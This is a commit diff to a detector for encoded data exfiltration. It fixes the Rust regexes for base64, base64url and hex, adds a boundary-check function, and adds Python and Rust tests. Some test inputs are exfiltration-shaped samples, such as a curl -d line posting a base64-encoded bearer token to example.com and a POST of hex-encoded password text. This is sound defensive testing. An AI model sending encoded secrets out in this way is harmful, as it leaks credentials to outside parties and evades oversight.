Skip to content

Commit 0daad47

Browse files
authored
fix: encoded exfil detector regex and boundary validation (#3379)
- Use core-only regex patterns for base64, base64url, and hex (the Rust regex crate does not support lookbehind/lookahead).
- Add has_valid_boundaries() and call it from scan_text so that adjacent encoded strings are both detected and false positives are avoided.
- Fix the printable_ratio filter for current Rust.
- Add Rust test test_scan_text_detects_adjacent_matches.
- Add Python tests: word boundaries, base64url, percent/escaped hex, no false positives (URLs, alphanumeric); run in Python and Rust modes.

Signed-off-by: Luca <lucarlig@protonmail.com>
1 parent b4d8770 commit 0daad47

File tree

2 files changed

+137
-16
lines changed

2 files changed

+137
-16
lines changed

plugins_rust/encoded_exfil_detection/src/lib.rs

Lines changed: 62 additions & 16 deletions
Original file line numberDiff line numberDiff line change
@@ -7,18 +7,18 @@ use std::collections::HashMap;
77
use std::sync::LazyLock;
88

99
static BASE64_RE: LazyLock<Regex> = LazyLock::new(|| {
10-
Regex::new(r"(?<![A-Za-z0-9+/=])[A-Za-z0-9+/]{16,}={0,2}(?![A-Za-z0-9+/=])")
11-
.expect("failed to compile BASE64_RE")
10+
// Match core pattern only; validate boundaries in code (Rust regex has no lookbehind/lookahead)
11+
Regex::new(r"[A-Za-z0-9+/]{16,}={0,2}").expect("failed to compile BASE64_RE")
1212
});
1313

1414
static BASE64URL_RE: LazyLock<Regex> = LazyLock::new(|| {
15-
Regex::new(r"(?<![A-Za-z0-9_\-])[A-Za-z0-9_\-]{16,}={0,2}(?![A-Za-z0-9_\-])")
16-
.expect("failed to compile BASE64URL_RE")
15+
// Match core pattern only; validate boundaries in code
16+
Regex::new(r"[A-Za-z0-9_\-]{16,}={0,2}").expect("failed to compile BASE64URL_RE")
1717
});
1818

1919
static HEX_RE: LazyLock<Regex> = LazyLock::new(|| {
20-
Regex::new(r"(?<![A-Fa-f0-9])[A-Fa-f0-9]{24,}(?![A-Fa-f0-9])")
21-
.expect("failed to compile HEX_RE")
20+
// Match core pattern only; validate boundaries in code
21+
Regex::new(r"[A-Fa-f0-9]{24,}").expect("failed to compile HEX_RE")
2222
});
2323

2424
static PERCENT_RE: LazyLock<Regex> = LazyLock::new(|| {
@@ -296,7 +296,7 @@ fn printable_ratio(data: &[u8]) -> f64 {
296296

297297
let printable = data
298298
.iter()
299-
.filter(|byte| (32..=126).contains(byte) || **byte == b'\n' || **byte == b'\r' || **byte == b'\t')
299+
.filter(|byte| (32..=126).contains(*byte) || **byte == b'\n' || **byte == b'\r' || **byte == b'\t')
300300
.count();
301301

302302
printable as f64 / data.len() as f64
@@ -322,6 +322,31 @@ fn has_egress_context(text: &str, start: usize, end: usize) -> bool {
322322
EGRESS_HINTS.iter().any(|hint| window.contains(hint))
323323
}
324324

325+
/// Check that the match at `text[start..end]` is not embedded in a longer run of
/// encoding-alphabet characters.
///
/// The Rust `regex` crate does not support lookbehind/lookahead, so the detector
/// patterns match only the core run and this function inspects the bytes on either
/// side of the match instead. Because no boundary character is consumed by the
/// regex, two candidates separated by a single delimiter can both be reported.
///
/// # Arguments
///
/// * `text` - the full haystack that was scanned.
/// * `start`, `end` - byte offsets of the match (half-open range).
/// * `core_chars` - the alphabet of the encoding. `=` may be listed, but it is
///   never treated as a continuation character, so `key=<payload>` is accepted.
///
/// # Returns
///
/// `true` when neither neighbouring byte belongs to the alphabet. A missing
/// neighbour (match touches the start or end of `text`, or an offset lies outside
/// `text`) counts as a valid boundary rather than panicking.
fn has_valid_boundaries(text: &str, start: usize, end: usize, core_chars: &str) -> bool {
    let bytes = text.as_bytes();

    // A neighbour breaks the boundary only if it is an ASCII alphabet character other
    // than '='. Bytes >= 0x80 belong to a multi-byte UTF-8 character and can never be
    // part of an encoded run, so they are boundaries without any decoding.
    let is_boundary = |neighbor: Option<&u8>| match neighbor {
        Some(&byte) => {
            !(byte.is_ascii() && byte != b'=' && core_chars.contains(char::from(byte)))
        }
        None => true,
    };

    // `checked_sub` + `get` avoid both the underflow at `start == 0` and an
    // out-of-bounds panic when the caller hands in a stale offset.
    let before = start.checked_sub(1).and_then(|idx| bytes.get(idx));
    let after = bytes.get(end);

    is_boundary(before) && is_boundary(after)
}
349+
325350
fn evaluate_candidate(
326351
text: &str,
327352
path: &str,
@@ -437,16 +462,24 @@ fn scan_text(text: &str, path: &str, cfg: &DetectorConfig) -> (String, Vec<Findi
437462
continue;
438463
}
439464

465+
let valid_chars = match encoding {
466+
"base64" => "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",
467+
"base64url" => "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_-=",
468+
"hex" => "ABCDEFabcdef0123456789",
469+
_ => "",
470+
};
471+
440472
for matched in regex.find_iter(text) {
441-
if let Some(finding) = evaluate_candidate(
442-
text,
443-
path,
444-
encoding,
445-
matched.as_str(),
446-
matched.start(),
447-
matched.end(),
448-
cfg,
449-
) {
473+
let start = matched.start();
474+
let end = matched.end();
475+
476+
if !valid_chars.is_empty() && !has_valid_boundaries(text, start, end, valid_chars) {
477+
continue;
478+
}
479+
480+
if let Some(finding) =
481+
evaluate_candidate(text, path, encoding, matched.as_str(), start, end, cfg)
482+
{
450483
let key = (finding.start, finding.end);
451484
match findings_by_span.get(&key) {
452485
Some(existing) if existing.score >= finding.score => {}
@@ -617,4 +650,17 @@ mod tests {
617650
let (_, findings) = scan_text(text, "", &cfg);
618651
assert!(findings.is_empty());
619652
}
653+
654+
#[test]
fn test_scan_text_detects_adjacent_matches() {
    // Two different secrets, each base64-encoded and wrapped in brackets so the
    // encoded runs are separated only by characters outside the base64 alphabet.
    let first_payload = STANDARD.encode(b"password=secret-value-one");
    let second_payload = STANDARD.encode(b"token=secret-value-two");
    let haystack = format!("[{}] [{}]", first_payload, second_payload);

    let config = DetectorConfig::default();
    let (_, findings) = scan_text(&haystack, "", &config);

    // Both candidates must be reported, and as distinct spans.
    assert_eq!(findings.len(), 2, "Expected 2 findings for adjacent base64 strings");
    let (left, right) = (&findings[0], &findings[1]);
    assert_ne!(left.start, right.start);
    assert_ne!(left.end, right.end);
}
620666
}

tests/unit/plugins/test_encoded_exfil_detector.py

Lines changed: 75 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -70,6 +70,81 @@ def test_clean_input_no_findings(self, use_rust: bool):
7070
assert findings == []
7171
assert redacted == payload
7272

73+
def test_base64_with_word_boundaries(self, use_rust: bool):
    """A base64 payload is found whether it is delimited by spaces, by the start or end of the text, or by punctuation."""
    cfg = EncodedExfilDetectorConfig()
    encoded = base64.b64encode(b"authorization: bearer secret-token-value").decode()

    # Each scenario pairs the scanned text with the message shown if nothing is detected.
    scenarios = (
        (f"data {encoded} end", "Should detect base64 with spaces"),
        (f"{encoded} followed by text", "Should detect base64 at start"),
        (f"text followed by {encoded}", "Should detect base64 at end"),
        (f"curl -d '{encoded}' https://example.com", "Should detect base64 with punctuation"),
    )
    for text, failure_message in scenarios:
        count, _, _ = _scan_container({"text": text}, cfg, use_rust=use_rust)
        assert count >= 1, failure_message
91+
92+
def test_hex_with_word_boundaries(self, use_rust: bool):
    """A hex payload is found when delimited by spaces or by punctuation such as '='."""
    cfg = EncodedExfilDetectorConfig()
    hex_data = b"password=secret-value-for-upload".hex()

    # Each scenario pairs the scanned text with the message shown if nothing is detected.
    scenarios = (
        (f"data {hex_data} end", "Should detect hex with spaces"),
        (f"POST /collect data={hex_data}", "Should detect hex with punctuation"),
    )
    for text, failure_message in scenarios:
        count, _, _ = _scan_container({"text": text}, cfg, use_rust=use_rust)
        assert count >= 1, failure_message
102+
103+
def test_no_false_positives_in_urls(self, use_rust: bool):
    """Plain URLs that carry no encoded payload must produce zero findings."""
    cfg = EncodedExfilDetectorConfig()
    benign_payload = dict(
        url="https://example.com/path/to/resource",
        message="Visit our website at https://example.com",
    )

    finding_count, _, _ = _scan_container(benign_payload, cfg, use_rust=use_rust)

    assert finding_count == 0, "Should not detect normal URLs as encoded exfil"
112+
113+
def test_concatenated_alphanumeric_not_detected(self, use_rust: bool):
    """A long identifier-like alphanumeric run that is not a real encoding must produce zero findings."""
    cfg = EncodedExfilDetectorConfig()
    identifier_payload = dict(id="user123456789abcdefghijklmnopqrstuvwxyz")

    finding_count, _, _ = _scan_container(identifier_payload, cfg, use_rust=use_rust)

    assert finding_count == 0, "Should not detect random alphanumeric strings"
119+
120+
def test_base64url_detection(self, use_rust: bool):
    """A URL-safe base64 payload is reported, labelled as either base64 or base64url."""
    cfg = EncodedExfilDetectorConfig()
    encoded = base64.urlsafe_b64encode(b"api_key=secret-token-value-here").decode()
    # Either label is acceptable for this payload.
    accepted_encodings = {"base64", "base64url"}

    count, _, findings = _scan_container({"data": "token=" + encoded}, cfg, use_rust=use_rust)

    assert count >= 1, "Should detect base64url encoding"
    assert any(finding.get("encoding") in accepted_encodings for finding in findings)
127+
128+
def test_percent_encoding_detection(self, use_rust: bool):
    """A fully percent-encoded secret is reported with encoding 'percent_encoding'."""
    cfg = EncodedExfilDetectorConfig()
    secret = "password=secret-value"
    # Encode every character as %hh (lowercase hex), not just the reserved ones.
    percent_encoded = "".join("%{:02x}".format(ord(ch)) for ch in secret)
    payload = {"data": f"send {percent_encoded} to server"}

    count, _, findings = _scan_container(payload, cfg, use_rust=use_rust)

    assert count >= 1, "Should detect percent encoding"
    assert any(finding.get("encoding") == "percent_encoding" for finding in findings)
138+
139+
def test_escaped_hex_detection(self, use_rust: bool):
    """A secret written as \\xNN escape sequences is reported with encoding 'escaped_hex'."""
    cfg = EncodedExfilDetectorConfig()
    secret = "token=secret"
    # Literal backslash-x followed by two lowercase hex digits per character.
    escaped_hex = "".join("\\x{:02x}".format(ord(ch)) for ch in secret)
    payload = {"data": f"payload {escaped_hex}"}

    count, _, findings = _scan_container(payload, cfg, use_rust=use_rust)

    assert count >= 1, "Should detect escaped hex"
    assert any(finding.get("encoding") == "escaped_hex" for finding in findings)
147+
73148

74149
@pytest.mark.asyncio
75150
class TestEncodedExfilPluginHooks:

0 commit comments

Comments
 (0)